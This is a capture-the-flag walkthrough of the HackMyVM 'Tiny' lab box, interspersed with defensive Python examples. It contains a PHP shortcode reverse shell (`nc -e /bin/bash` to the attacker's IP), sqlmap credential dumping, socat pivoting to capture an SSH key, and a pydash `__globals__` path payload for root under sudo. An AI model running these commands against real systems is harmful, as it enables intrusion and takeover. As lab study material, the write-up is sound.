Host discovery

sudo nmap -sn 192.168.56.0/24

192.168.56.101 is the target IP.

Port scan

sudo nmap --min-rate 10000 -p- 192.168.56.101
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-02 07:22 UTC
Nmap scan report for 192.168.56.101 (192.168.56.101)
Host is up (0.00013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8888/tcp open sun-answerbook
MAC Address: 08:00:27:A2:36:11 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.50 seconds
sudo nmap -sT -sV -sC -O -p22,80,8888 192.168.56.101
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-02 07:23 UTC
Nmap scan report for 192.168.56.101 (192.168.56.101)
Host is up (0.00038s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey:
| 256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
|_ 256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Blog
| http-robots.txt: 15 disallowed entries
| /wp-admin/ /cgi-bin/ /private/ /temp/ /backup/ /old/
| /test/ /dev/ / /misc/ /downloads/ /doc/ /documents/
|_/restricted/ /confidential/
|_http-generator: WordPress 6.3.1
8888/tcp open http-proxy tinyproxy 1.11.1
|_http-server-header: tinyproxy/1.11.1
|_http-title: 403 Access denied
MAC Address: 08:00:27:A2:36:11 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.51 seconds
sudo nmap --script=vuln -p22,80,8888 192.168.56.101            
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-02 07:24 UTC
Nmap scan report for 192.168.56.101 (192.168.56.101)
Host is up (0.00028s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.101
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.101:80/
| Form id: wp-block-search__input-1
|_ Form action: http://tiny.hmv/
| http-enum:
| /wp-login.php: Possible admin folder
| /robots.txt: Robots file
| /readme.html: Wordpress version: 2
| /: WordPress version: 6.3.1
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: Interesting, a readme.
8888/tcp open sun-answerbook
MAC Address: 08:00:27:A2:36:11 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.13 seconds
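As an added example (mine, not part of the original write-up): a small parser for the port-scan output above that compares the open ports against an expected baseline and flags anything outside it. This is how a defender would notice the stray tinyproxy on 8888 during a routine exposure check. The baseline set {22, 80} is an assumption for illustration; the sample text is the scan output from this page.

```python
import re

# Sample nmap output, copied from the -p- scan above (header, result rows, MAC line).
NMAP_OUTPUT = """\
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8888/tcp open sun-answerbook
MAC Address: 08:00:27:A2:36:11 (Oracle VirtualBox virtual NIC)
"""

# Matches "<port>/<proto> <state> <service>" with any amount of whitespace between fields.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_open_ports(output):
    """Return {port: service} for every line nmap reports as open."""
    ports = {}
    for line in output.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(3) == "open":
            ports[int(m.group(1))] = m.group(4)
    return ports


def unexpected_ports(output, baseline):
    """Open ports that are not in the approved baseline set (assumed baseline, e.g. {22, 80})."""
    found = parse_open_ports(output)
    return {port: svc for port, svc in found.items() if port not in baseline}


if __name__ == "__main__":
    for port, svc in unexpected_ports(NMAP_OUTPUT, {22, 80}).items():
        print(f"unexpected listener: {port}/tcp ({svc})")
```

Run against a saved scan to get a one-line list of services that should not be reachable; feeding the same scan into a diff against last week's result catches new exposures the same way.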

Add tiny.hmv to the hosts file.

Try enumerating subdomains.

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://tiny.hmv' -H 'HOST:FUZZ.tiny.hmv' -fs 24129

There is a wish.tiny.hmv.

Web

Port 8888 appears to be a proxy? Accessing it directly returns access denied; it seems it has to be used as a proxy to reach anything. The version is tinyproxy 1.11.1.

The web service on port 80 is a WordPress site. A directory scan turns up nothing special, and the login page does not give much to work with.

wish.tiny.hmv is something like a guestbook form, and the request can be captured. Entering a few SQL injection strings produces odd responses.

Run it through sqlmap:

sqlmap -r sql.txt --batch --level 5 --dump

Credentials obtained: umeko/fuckit!

Successfully logged into WordPress.

Getshell

However, this user does not seem to have permission to write a web shell, so let's see whether any plugin or theme has an exploitable vulnerability.

wpscan --url http://tiny.hmv/ --enumerate ap --plugins-detection aggressive --api-token=<your-api-token>

Found a plugin RCE vulnerability that does not require administrator privileges: OpenHook. It looks like a very recent CVE and allows executing PHP code.

In the admin dashboard, use Add New on the left to create a new post, click the plus sign at the top left, find the Shortcode block, and add it.

Enter:

[php]
<?php system('nc -e /bin/bash 192.168.56.102 1234') ?>
[/php]

In the right-hand panel change the Author to admin, then click Publish at the top right.

Start a listener, visit the post just published, and we get a shell.
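From the defender's side, the thing that made this step work is a plugin that executes whatever sits inside a [php] shortcode in post content. As an added example (mine, not the plugin's or the box's code): a sweep over post bodies that extracts [php] shortcodes and flags any that call shell or eval functions, which is the review a site owner would run over wp_posts after seeing OpenHook installed. The post IDs and bodies are constructed samples; the function list is a starting set, not an exhaustive one.

```python
import re

# Constructed sample post bodies keyed by post id (not taken from the box's database).
SAMPLE_POSTS = {
    101: "Welcome to my blog! Nothing to see here.",
    102: "[php]\n<?php system('id') ?>\n[/php]",
    103: "[php] <?php echo date('Y'); ?> [/php]",
}

# [php] ... [/php] blocks, possibly spanning lines, case-insensitive tag names.
SHORTCODE = re.compile(r"\[php\](.*?)\[/php\]", re.DOTALL | re.IGNORECASE)

# PHP functions that hand a string to a shell or evaluate code; any hit deserves a look.
DANGEROUS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval")
CALL = re.compile(r"\b(" + "|".join(DANGEROUS) + r")\s*\(", re.IGNORECASE)


def php_shortcodes(content):
    """All [php]...[/php] bodies found in one post body, whitespace trimmed."""
    return [m.group(1).strip() for m in SHORTCODE.finditer(content)]


def dangerous_calls(content):
    """Lower-cased names of shell/eval functions called inside [php] shortcodes of a post."""
    hits = []
    for body in php_shortcodes(content):
        hits.extend(fn.lower() for fn in CALL.findall(body))
    return hits


def audit_posts(posts):
    """Map post id -> list of dangerous call names, only for posts that need review."""
    flagged = {}
    for post_id, body in posts.items():
        calls = dangerous_calls(body)
        if calls:
            flagged[post_id] = calls
    return flagged


if __name__ == "__main__":
    for post_id, calls in audit_posts(SAMPLE_POSTS).items():
        print(f"post {post_id}: [php] shortcode calls {', '.join(calls)}")
```

The shortcode regex is deliberately loose (any case, any whitespace) because the goal is triage, not parsing; a post that legitimately uses [php] for a date stamp (id 103) passes, while one that shells out (id 102) is reported.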

Lateral movement

Move the shell into meterpreter.

There is also a user called vic, but we have no access to that account yet.

We also find the WordPress database credentials, but this is information we already had.

define( 'DB_NAME', 'wordpressdb' );
define( 'DB_USER', 'wordpressuser' );
define( 'DB_PASSWORD', '6rt443RKhwTXjWDe' );
define( 'DB_HOST', 'localhost' );

ss -tlnp
State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 511 127.0.0.1:8000 0.0.0.0:*
LISTEN 0 1024 0.0.0.0:8888 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 1024 [::]:8888 [::]:*
LISTEN 0 128 [::]:22 [::]:*
LISTEN 0 511 *:80 *:*
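The useful signal in that ss listing is which sockets are loopback-only: those are exactly the services a foothold can pivot to that never showed up in the external scan. As an added example (mine, not from the original post): a parser that classifies the listeners above into local-only versus exposed, the kind of inventory a defender keeps so that a surprise 127.0.0.1:8000 stands out. The sample text is the ss output from this page.

```python
import ipaddress

# ss -tlnp output copied from the box above (header plus LISTEN rows).
SS_OUTPUT = """\
State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 511 127.0.0.1:8000 0.0.0.0:*
LISTEN 0 1024 0.0.0.0:8888 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 1024 [::]:8888 [::]:*
LISTEN 0 128 [::]:22 [::]:*
LISTEN 0 511 *:80 *:*
"""


def split_local(local):
    """Split 'addr:port' (IPv6 written as '[addr]:port') into (addr, port)."""
    addr, _, port = local.rpartition(":")
    return addr.strip("[]"), int(port)


def is_loopback(addr):
    """True only for 127.0.0.0/8 or ::1; '*' (dual-stack wildcard) counts as exposed."""
    if addr == "*":
        return False
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def classify_listeners(output):
    """Return {'local_only': {ports}, 'exposed': {ports}} from ss -tlnp text."""
    result = {"local_only": set(), "exposed": set()}
    for line in output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        addr, port = split_local(fields[3])
        key = "local_only" if is_loopback(addr) else "exposed"
        result[key].add(port)
    return result


if __name__ == "__main__":
    summary = classify_listeners(SS_OUTPUT)
    print("loopback-only ports:", sorted(summary["local_only"]))
    print("exposed ports:      ", sorted(summary["exposed"]))
```

Comparing the exposed set with the external nmap result is a quick consistency check; the local-only set (3306 and 8000 here) is what belongs in the box's threat model for post-compromise movement.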

There is a port 8000 listening on localhost only; forward it with socat:

./socat tcp-listen:10000,reuseaddr,fork tcp:127.0.0.1:8000

Visiting port 10000 shows a login prompt; it seems to be a web service.

Upload pspy to watch processes: tinyproxy is running in the background. Check its config file:

cat /etc/tinyproxy/tinyproxy.conf

It forwards the service's requests to port 1111.

nc -lvnp 1111

We then receive a request aimed at port 8000 that appears to involve a private key. In other words, tinyproxy automatically requests the private key from the service on port 8000 and sends the response on to port 1111? So by connecting port 1111 to port 8000 with socat, with -v for verbose output, we can capture the private key.

./socat -v TCP-LISTEN:1111,reuseaddr,fork TCP:127.0.0.1:8000

After obtaining the private key, copy it to Kali, set its permissions, and connect as the vic user.

Privilege escalation

We can run /opt/car.py* as root without a password.

I originally wanted to create a reverse shell named something like car.py1.py in that directory to escalate, but we have no write permission there.

So look at the contents of car.py: roughly, it uses functions from the pydash library to invoke an object's methods by a dotted path, and the pydash.objects.invoke function has a vulnerability.

https://security.snyk.io/vuln/SNYK-PYTHON-PYDASH-5916518

sudo /usr/bin/python3 /opt/car.py __init__.__globals__.random._os.system /bin/bash

Now we are root!
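The root cause in that last step is a path string, taken from the command line and handed to pydash.objects.invoke, that is allowed to walk through dunder attributes. As an added mitigation example (mine, not the box's car.py, whose contents are not reproduced here): a guard that validates each path segment before resolving it, written in plain Python so it runs without pydash. The Car and Engine classes are constructed stand-ins; the linked advisory tracks the upstream fix, and validating caller-supplied paths is the defense in depth regardless of library version.

```python
import re

# Plain identifiers only: no leading underscore, so __init__, __globals__ and _os are all refused.
SEGMENT = re.compile(r"^[A-Za-z][A-Za-z0-9_]*$")


class Engine:
    """Constructed stand-in for an object whose public method a script wants to call."""

    def start(self):
        return "engine started"


class Car:
    """Constructed stand-in for the object car.py drives (not the box's code)."""

    def __init__(self, model):
        self.model = model
        self.engine = Engine()


def validate_path(path):
    """Split a dotted path and reject any segment that is not a plain public identifier."""
    segments = path.split(".")
    for seg in segments:
        if not SEGMENT.match(seg):
            raise ValueError(f"refusing path segment {seg!r}")
    return segments


def guarded_invoke(obj, path, *args):
    """Resolve a validated dotted path on obj with getattr and call the result."""
    target = obj
    for seg in validate_path(path):
        target = getattr(target, seg)
    if not callable(target):
        raise TypeError(f"{path} does not name a callable")
    return target(*args)


if __name__ == "__main__":
    car = Car("mini")
    print(guarded_invoke(car, "engine.start"))          # engine started
    try:
        guarded_invoke(car, "__init__.__globals__.random._os.system", "/bin/bash")
    except ValueError as err:
        print("blocked:", err)
```

Whitelisting identifier shape is simpler and safer than blacklisting known-bad names such as __globals__, because every route out of an object's namespace in Python goes through an underscore-prefixed attribute somewhere along the path.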

Closing thoughts

This is the first HackMyVM machine I have done, and I picked one rated hard. It really was not too easy: from the vulnerable WP plugin at the start, through the internal lateral movement, to privilege escalation, every step had a bit of difficulty to it. Quite fun.